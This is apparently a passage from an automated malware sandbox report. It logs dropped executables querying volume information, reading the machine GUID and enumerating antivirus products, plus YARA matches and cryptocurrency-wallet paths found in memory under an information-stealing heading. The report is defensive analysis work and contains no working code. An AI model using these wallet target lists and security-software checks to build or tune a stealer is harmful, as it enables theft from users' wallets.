                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062125001\4ee3234999.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062125001\4ee3234999.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062126001\a6c5834e2f.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062126001\a6c5834e2f.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062127001\62950fb3a8.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062127001\62950fb3a8.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062128101\9673a0a47c.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062128101\9673a0a47c.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062129021\am_no.cmd VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1062129021\am_no.cmd VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B1CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,6_2_00B1CBEA
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: AApUa7VQiy.exe, 00000000.00000003.1382937606.0000000001433000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2036330174.00000000011CD000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000002.2108189234.00000000011CE000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2035595673.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2092673789.00000000011CE000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2036330174.00000000011D4000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2035830156.0000000001264000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000002.2108189234.00000000011D4000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2092673789.00000000011D4000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2077350251.00000000011D4000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2077350251.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                            Source: Yara matchFile source: 7.2.skotes.exe.20000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.2.skotes.exe.20000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.BEB973FPO2R62ZWABVOVP8TC.exe.b00000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.skotes.exe.20000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000003.1506211610.00000000051D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.1546879415.0000000000B01000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000003.1553837729.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.1594893003.0000000000021000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.2746685705.0000000000021000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.1587332477.0000000000021000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1732352308.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: AApUa7VQiy.exe PID: 7488, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: ktIplF5.exe PID: 4272, type: MEMORYSTR
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Source: Yara matchFile source: 0000000C.00000002.2766438930.0000000002B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.2769111008.0000000002BD1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: flv2aviconverter24.exe PID: 2400, type: MEMORYSTR
                            Source: Yara matchFile source: 00000003.00000002.1533551948.0000000000691000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1492478453.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.1536146790.000000000103E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: ES0PERDCSSGNQK1XTMK282189FFMR8.exe PID: 7892, type: MEMORYSTR
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Source: AApUa7VQiy.exe, 00000000.00000003.1372532906.0000000001458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
                            Source: AApUa7VQiy.exe, 00000000.00000003.1372532906.0000000001458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                            Source: AApUa7VQiy.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                            Source: AApUa7VQiy.exe, 00000000.00000003.1372532906.0000000001458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                            Source: AApUa7VQiy.exe, 00000000.00000003.1372532906.0000000001458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                            Source: AApUa7VQiy.exe, 00000000.00000003.1341672142.0000000005D7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                            Source: AApUa7VQiy.exe, 00000000.00000003.1383159698.0000000001458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                            Source: AApUa7VQiy.exeString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
